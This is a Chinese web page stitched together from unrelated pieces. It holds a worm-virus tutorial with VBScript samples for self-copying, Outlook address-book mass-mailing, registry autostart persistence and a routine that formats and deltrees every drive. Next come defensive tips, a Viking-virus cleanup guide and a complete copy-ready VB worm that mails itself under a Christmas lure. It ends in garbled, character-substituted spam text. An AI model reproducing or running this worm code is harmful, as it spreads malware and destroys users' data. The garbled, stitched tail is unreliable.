蠕虫病毒是计算机病毒的一种。它的传染机理是利用 *** 进行复制和传播,传染途径是通过 *** 和电子邮件。
比如近几年危害很大的“尼姆达”病毒就是蠕虫病毒的一种。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者 *** 共享进行传播,最终破坏用户的大部分重要数据。
蠕虫病毒的一般防治 *** 是:使用具有实时监控功能的杀毒软件,并且注意不要轻易打开不熟悉的邮件附件
蠕虫病毒与一般的计算机病毒不同,它不采用将自身拷贝附加到其他程序中的方式来复制自己,所以在病毒中它也算是一个“另类”。蠕虫病毒的破坏性很强,部分蠕虫病毒不仅可以在因特网上兴风作浪,局域网也成了它们“施展身手”的舞台——蠕虫病毒可以潜伏在基于客户机/服务机模式的局域网的服务机上的软件内,当客户机访问服务机,并对有毒的软件实施下载后,病毒就神不知、鬼不觉地从服务机上“拷贝”到客户机上了。
其实脚本病毒是很容易制造的,它们都利用了视窗系统的开放性的特点。特别是COM到COM+的组件编程思路,一个脚本程序能调用功能更大的组件来完成自己的功能。以VB脚本病毒(如欢乐时光、 I Love You 、库尔尼科娃病毒、Homepage病毒等)为例,他们都是把.vbs脚本文件添在附件中,最后使用*.htm.vbs等欺骗性的文件名。下面我们详细了解一下蠕虫病毒的几大特性,从中找到对付蠕虫病毒的 *** 。
一、蠕虫病毒具有自我复制能力
我们以普通的VB脚本为例来看看:
Set objFs=CreateObject (“Scripting.FileSystemObject”)
·创建一个文件系统对象
objFs.CreateTextFile ("C:\virus.txt", 1)
·通过文件系统对象的 *** 创建了一个TXT文件。
如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘中创建一个TXT文件了。倘若我们把第二句改为:
objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")
就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我复制的功能,已经具备病毒的基本特征——自我复制能力。
二、蠕虫病毒具有很强的传播性
病毒需要传播,电子邮件病毒的传播无疑是通过电子邮件传播的。对于OutLook来说地址簿的功能相当不错,可是也给病毒的传播打开了方便之门。几乎所有通过OutLook传播的电子邮件病毒都是向地址簿中存储的电子邮件地址发送内同相同的脚本附件完成的。看看如下的代码:
Set objOA=Wscript.CreateObject ("Outlook.Application")
·创建一个OUTLOOK应用的对象
Set objMapi=objOA.GetNameSpace ("MAPI")
·取得MAPI名字空间
For i=1 to objMapi.AddressLists.Count
·遍历地址簿
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)
objMail.Recipients.Add (objAddList. AddressEntries (j))
·取得收件人邮件地址
objMail.Subject="你好!"
·设置邮件主题
objMail.Body="这次给你的附件,是我的新文档!"
·设置信件内容
objMail.Attachments.Add (“c:\virus.vbs")
·把自己作为附件扩散出去
objMail.Send
·发送邮件
Next
Next
Set objMapi=Nothing
·清空objMapi变量,释放资源,值得学习的编程习惯
Set objOA=Nothing
·清空objOA变量
这一小段代码的功能是向地址簿中的用户发送电子邮件,并将自己作为附件扩散出去。这段代码中的之一行是创建一个Outlook的对象,是必不可少的。在其下是一个循环,在循环中不断地向地址簿中的电子邮件地址发送内容相同的信件。蠕虫病毒就是这样进行传播的。
三、蠕虫病毒具有一定的潜伏性
要使病毒潜伏,对于“脚本”语言并不是很难的一件事,因为这种语言并不是面向对象的可视化编程,自然就不存在窗体,所以可以免去隐藏窗体的麻烦。从I love you病毒中,很容易看出蠕虫病毒在潜伏时的特点,它们多数是修改注册表等信息以判断各种条件及取消一些限制。以下是从I love you病毒中提取出的部分代码:
On Error Resume Next
·容错语句,避免程序崩溃
dim wscr,rr
set wscr=CreateObject ("WScript.Shell")
·击活 WScript.Shell 对象
rr=wscr.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
·读入注册表中的超时键值
if (rr=1) then
·超时设置
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
上面这部分代码很明显是调整脚本语言的超时设置。下面的一段代码则是修改注册表,使得每次系统启动自动执行脚本:
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Run\MSKernel32",dirsystem"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\RunServices\Win32DLL",dirwin"\Win32DLL.vbs"
其中MSKernel32.vbs和Win32DLL.vbs是病毒脚本的一个副本。怎么样,看出蠕虫病毒是怎样潜伏的吧?
四、蠕虫病毒具有特定的触发性
在这里我们以时间触发为例,使用一个很简单的判断程序,来判断时间到了没有,如果有就开始执行代码。好,我们看看程序:
x=time ()
if x=xx.xx.xx then
end if
就这么简单一个程序,就可以实现特定条件触发事件的目的。当然了,病毒 *** 者还可以通过监视运行某个程序而触发事件,也可以响应键盘触发事件等等。
五、蠕虫病毒具有很大的破坏性
蠕虫病毒的破坏性大家都有所了解吧?我们以著名的蠕虫病毒Jessica Worm中的部分破坏代码为例来加以分析说明:
sub killc ()
·破坏硬盘的过程
On Error Resume Next
·容错语句,避免程序崩溃
dim fs,auto,disc,ds,ss,i,x,dir
Set fs = CreateObject ("Scripting.FileSystemObject")
Set auto = fs.CreateTextFile ("c:\Autoexec.bat", True)
·建立或修改自动批处理
auto.WriteLine ("@echo off")
·屏蔽掉删除的进程
auto.WriteLine ("Smartdrv")
·加载磁盘缓冲,好毒啊!
Set disc = fs.Drives
·得到驱动器的 ***
For Each ds in disc
If ds.DriveType = 2 Then
·如果驱动器是本地盘
ss = ss ds.DriveLetter
·就将符号连在一起
End if
Next
ss=LCase (StrReverse (Trim (ss)))
·得到符号串的反向小写形式
For i=1 to Len (ss)
·遍历每个驱动器
x=Mid (ss,i,1)
·读每个驱动器的符号
auto.WriteLine ("format/autotest/q/u "x":")
·反向 (从Z:到A:)自动格式化驱动器,狠毒啊!
next
For i=1 to Len (ss)
x=Mid (ss,i,1)
auto.WriteLine ("deltree/y "x":")
·怕Format失效用Deltree双保险,知道厉害了吧
next
auto.Close
·关闭批处理文件
set dir=fs.GetFile ("c:\Autoexec.bat")
dir.attributes=dir.attributes+2
·将自动批处理文件改为隐藏
End sub
如果以前你没有亲身体验到蠕虫病毒的厉害,那么从这个小例子中,你应该知道蠕虫病毒的厉害了吧?
六、反击蠕虫病毒
我们已经了解 *** 蠕虫病毒的构造,现在可以逐个击破 *** 蠕虫病毒几大功能模块。使 *** 蠕虫病毒不能这么横行无忌的破坏我们的电脑及盗窃我们的资料。
1.首先我们应该先看看如何破解病毒的破坏力最强的功能模块——病毒的破坏性。
*** 蠕虫病毒不可能像传统病毒一样调用汇编程序来实现破坏功能。它只能通过调用已经编译好的带有破坏性的程序来实现这一功能。那么我们就把本地的带有破坏性的程序改名字,比如把format.com改成fmt.com,那样病毒的编辑者就无发实现用调用本地命令来实现这一功能。(这 *** 简单易行并不影响电脑的正常使用,但也有其不足的地方,我们会在下文中会对其不足进行说明。)
2.我们再看看如何破解病毒的潜伏性及触发性功能模块。
它是通过死循环语句完成的,且一开机就运行这程序,等待触发条件。用Ctrl+Alt+Del弹出关闭程序对话框方可看见一个叫Wscript.exe的程序在后台运行(那样的程序不一定是病毒,但病毒也常常伪装成那样的程序),我们为了防止病毒对我们的机算机进行破坏,我们不得不限制这类程序的运行时间(宁可错杀一千,也不可放过一个),以达到控制的效果。首先在“开始”菜单的“运行”里输入“Wscript”,然后会弹出一个窗体。单击“经过以下数秒终止脚本”前面的复选框,使复选框前面打起钩,然后调整下方的时间设为最小值即可。这样可以破解一部分这样的病毒的潜伏,消除潜伏性自然触发性就破解了。
另外,由于蠕虫病毒大多是用VBScript脚本语言编写的,而VBScript代码是通过Windows Script Host来解释执行的,因此将Windows Script Host删除,就再也不用担心这些用VBS和 *** 编写的病毒了!从另一个角度来说,Windows Script Host本来是被系统管理员用来配置桌面环境和系统服务,实现最小化管理的一个手段,但对于大部分一般用户而言,WSH并没有多大用处,所以我们可以禁止Windows Script Host。
卸载Windows Scripting Host:
在Windows98中(NT4.0以上同理),打开“控制面板”,打开“添加/删除程序”,点选“Windows安装程序”,再鼠标双击其中的“附件”一项,然后再在打开的窗口中将“Windows Scripting Host”一项的“对勾”去掉,然后点“确定”,再点“确定”,这样就可以将Windows Scripting Host卸载。
如果你嫌麻烦,可以到Windows目录中,找到WScript.exe和 *** cript.exe,更改其名称或者干脆删除。
3.接下来就该破解病毒的自我复制能力功能模块。
大多数利用VBscript编写的病毒,自我复制的原理基本上是利用程序将本身的脚本内容复制一份到一个临时文件,然后再在传播的环节将其作为附件发送出去。而该功能的实现离不开“FileSystemObject”对象,因此禁止了“FileSystemObject”就可以有效的控制VBS病毒的传播。具体操作 *** :用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。
4.破解完了以上四个功能模块,自然第五个功能模块传播性就不攻自破了。你还记不记得以上我们所说过的破解功能模块的不足,虽然限制别人不能调用你的带有破坏性的程序,但你也别忘了,别人可以用网页拷贝的方式放入你的计算机中,再通过以上 *** 对你的计算机进行危害。要彻底防治 *** 蠕虫病毒,还须设置一下你的浏览器。 *** 是:在IE窗口中点击“工具→Internet选项,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。不过,这样做在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。有利就有弊,您还是自己看着办吧。
只要用了以上的 *** 就可以有效地防范蠕虫病毒,现在,你不会认为蠕虫病毒可怕了,至少,对蠕虫病毒的神秘感打消了吧?如是,则达到了我们的目的!
解决办法:
(友情提示:并不是所有的病毒重装或恢复系统就能解决问题,这个就不行,重新装系统并不比手工删要简单多少,因为病毒感染了你电脑中的软件,所以你还要重新装所有的软件,如果你不是刚重新装了系统,我建议你还是手工删。如果你是恢复备份,你要确保你的GHOST软件和GHOST文件没有被感染,如果被感染了,装了也等于没装。手工删的 *** 也适用于重装系统和恢复备份)
*********手工清理办法开始***********
注意:请严格按下列流程操作,中间不要有颠倒、遗漏的步骤,更不要中间穿插一些你自己的动作,既然用我的 *** 就请相信我。。。
一、准备工作;
1、准备如下软件:
超级兔子:下载地址:
卡巴斯基6.0中文版:下载地址:
卡巴斯基6.0中文版KEY:见附件。点击浏览该文件
威金免疫包:点击下载(有朋友说下载不了,我又传了个附件上来,下不了的可以从附件下)点击浏览该文件
威金批处理工具:见附件点击浏览该文件
2、如果是winxp用户在杀毒前请务必将所有硬盘自动还原关闭:"我的电脑--属性--自动还原---关闭所有",win2000用户可免
3、如果你处在局域网中,请给你的计算机设置密码。
4、卸载杀毒软件(因为你的杀软也可能被感染了),重启,并进安全模式。
二、杀毒
1、显示隐藏文件:
打开“我的电脑”——工具——文件夹选项——查看
a、把“隐藏受保护的操作系统文件(推荐)”和“隐藏已知文件类型的扩展名”前面的勾去掉;
b、勾中“显示所有文件和文件夹”
2、解压缩前面下载的“威金批处理”并运行“威金批处理1.bat”,等待自动关闭后,再次运行“威金批处理1.bat”
3、解压缩前面下载的“威金免疫包”,解压缩后按里面的使用说明操作。
4、重启
5、安装并运行超级兔子,提示你升级,点“否”
a、点“超级兔子魔法设置”,选择“启动程序”
b、找到里面是否有指向rundl132.exe和logo1_.exe的项目,如果有,右击该项目选择“删除项目”,然后点“确定”
c、点“超级兔子优化王”——“下一步”——“自动优化”——“下一步”——“确定”——“完成”
e、一路点“退出”,退出兔子。
6、解压缩下载的kis6.sch.rar,将从附件中下载的Kis6 KEY解压缩后,将其中的“kis6-070716.key”放置在与KIS6安装程序平级的目录下,运行kis6.sch.msi,除了选择安装目录,安装方式点“完整”外,其他全部点下一步,只到安装完成,自动重新启动计算机。
7、升级KIS6
升级过程中,运行“威金批处理”中的“威金批处理2.bat”,如果显示有_desktop.ini被删除,那就等自动关闭后,再次运行“威金批处理2.bat”直到所有的硬盘都显示找不到_desktop.ini。
8、KIS6升级成功后,全盘扫描电脑,如果报正常软件是病毒,点清除(是清除不是删除),如果报的毒不认识,直接点删除。(最近有朋友反映卡巴只能删除不能清除,那是威金的变种,如果后缀是.ae的,可以清除,如果后缀是.bb或其他的变种,是清除不可的。打好免疫包后,双击被感染的软件,会生成一个同名的.exe.exe文件,将原来的.exe文件删除,然后将.exe.exe改名为.exe。。
***************手工清理办法结束************
至此,威金病毒已经彻底从你心爱的电脑中消失了,并永远不会再发作。
恭喜你大功告成!呵呵,摧残你电脑和你人格的威金终于 *** 掉了!
是不是感觉很爽呢?呵呵
(注:因本人最近实在太忙,所以朋友们发上来的帖子可能不能及时的进行恢复,请见谅,其实如果完全按照我说的 *** 操作,应该是没有问题的)
最后感谢您光临和信任蒲公英,感觉好的话,以后常来玩哦,蒲公英也需要大家的支持。
另外本人辛辛苦苦的整理的文章,希望转载的朋友注明出处,并做好原文连接,谢谢!
最最最后:希望用此 *** 后的朋友有什么问题请及时跟帖反馈,以便更加完善,如果效果好,也希望来支持下,以便别人用着也放心。呵呵
========================从这行以下开始复制===========================
Sub Main()
'TaskVisible的功能是把程序在End Task表中除掉。
App.TaskVisible = False
'阻止问题发生
On Error Resume Next
Dim Location, Location2, DesLocation, DesLocation2
'得到EXE的位置
Location = App.Path "\" App.EXEName ".exe"
Location2 = App.Path App.EXEName ".exe"
'设定目的地
DesLocation = "C:\WINDOWS\SYSTEM\WinMapi.exe"
DesLocation2 = "C:\WINNT\SYSTEM\Mapi.exe"
'开始复制自己
FileCopy Location, DesLocation
FileCopy Location2, DesLocation
FileCopy Location, DesLocation2
FileCopy Location2, DesLocation2
Dim Var1, FilePath, FileName, FullLocation, MyApp
Dim Christmas, List, AddList, AddressListCount
Dim Merry, AdEntries, Attachs, Msg
Var1 = "True"
FilePath = App.Path
FileName = App.EXEName
FullLocation = FilePath "\" FileName
Set MyApp = CreateObject("Outlook.Application")
If MyApp = "Outlook" Then
Set Christmas = MyApp.GetNameSpace("mapi")
Set List = Christmas.AddressLists
For Each Addresslist In List
If Addresslist.AddressEntries.Count 0 Then
AddressListCount = Addresslist.AddressEntries.Count
For AddList = 1 To AddressListCount
Set Merry = MyApp.CreateItem(0)
Set AdEntries = Addresslist.AddressEntries(AddList)
Merry.To = AdEntries.Address
Merry.Subject = "圣诞节快乐!!"
Merry.Body = "圣诞节快乐!这是一个特别个你的圣诞节的礼物!过个快乐的圣诞节! "
Set Attachs = Merry.Attachments
Attachs.Add FullLocation
If Var1 = "true" Then
Merry.DeleteAfterSubmit = True
If Msg.To "" Then
Merry.send
End If
End If
Next
Beep
End If
Next
End If
Dim Reg
Set Reg = CreateObject("wscript.Shell")
'把资料写入Registry
Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mapi", "C:\WINNT\SYSTEM\Mapi.exe"
Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinMapi", "C:\WINDOWS\SYSTEM\WinMapi.exe"
End Sub
====================这行和这行以下不要复制===========================
可以用的话,别忘了给我分,测试 *** :保存时把记事本名称的后缀改为.bat用杀软查毒。
建议:先开机进入安全模式(如果进不去,就悲剧了。那就调高虚拟内存在杀毒) 删除系统临时文件 因为之一个提示蠕虫是在临时文件夹的位置
自己手动杀毒 用超级巡警文件暴力删除器 删除 并勾上阻止再生
在用杀毒软件 杀毒
G:\pagefile.sys 是系统页面文件 也就是系统虚拟内存
不过好像一般位置在c盘的(但他可以设在别的盘) 小心
你的运行速度慢一般是病毒引起的 就是蠕虫 打开任务管理器 看看有什么可疑的进程 如Thunder.exe(明明没有开迅雷但有这个进程 结束掉)Uninstall.exe 等
你有360吗 如果有打开360 看开机启动项 如果开机启动项中有可以的进程如Uninstall.exe Thunder.exe 等 还有一些后缀为bat lnk等 全部关掉 找到病毒位置 杀掉
外国消息 起源 :央望网 二0 一 八年0 八月0 五日 一 八: 五 九 A-A+ 扫一扫 脚机 浏览 尔要分享 QQ空间新浪微专腾讯微专QQ微疑 本题目 : 央望网新闻 : 八月 三日早,针 对于美圆正在此前颁布 对于外圆 二000亿美圆输美产物 添征 一...
从前 提到单十一这皆是王老五骗子 才过的节日,而如今 单十一撼身一酿成 了齐平易近 买物狂悲节。正在单十一时代 以淘宝地猫为主的买物仄台都邑 拉没各类 劣惠运动 以及谦减扣头 ,否以算患上上是整年 最廉价 的时刻 了。这么地猫单十一运动 何时开端 呢?上面便跟百思特小编去具体 相识 一高 二0 二0...
当然,负责会有吃亏 ;提醒 :投资有风险,昨天,阅批利孬新闻 比特赓续 ,如今 是 二0 一 九年 八月的止情 一万美圆一枚。 今朝 正在数字泉币 投资商场异常 水,如今 阅批一个若干 群众币 二0 一 八现金年 六月 二0日今朝 阅批,您孬。 合折群众币 七币- 八万阁下 ,相闭融资主体经由过程...
很快便要到年夜 寒了,后来的骨气 便是坐春,否能许多 人会认为 坐春应该便会入进秋日 ,地气清新 舒畅 了,但事例没有是如许 的,秋日 去了借有一个很让人畏惧 的春山君 ,这年夜 野 晓得何时坐春以及几号坐春吗,交高去年夜 野便随百思特小编一路 相识 看看~ ...
滇池小书虫 0 六-0 八 一 九: 三 二 正在外国汗青 的漫冗长河面,那个名字有些许生疏 ,他即没有像项羽力拔山兮气盖世,也没有像异时期 的刘裕这样智计百没,他有的仅仅倔强 ,誓 逝世不平 的精力 ,正在谁人 摇摇欲坠 的时期 面自成一家。 冉闵 冉闵出身 的北南晨是外国汗青...
一米如下孩子免票 二0 一 一年动专会主场馆仍设正在,最佳是曾经来过了的给个尺度 的谜底 吧,客岁 cp 三是 二0元,怒悲两次元的同伙 否以来看一高` 二 五元一弛门票,银魂、五十到一百吧。尔次要来看都川杂子的推。 正在淘宝或者者部门 真体店有卖,否以存眷 那圆里的微专 预卖票貌似全体 采取 电...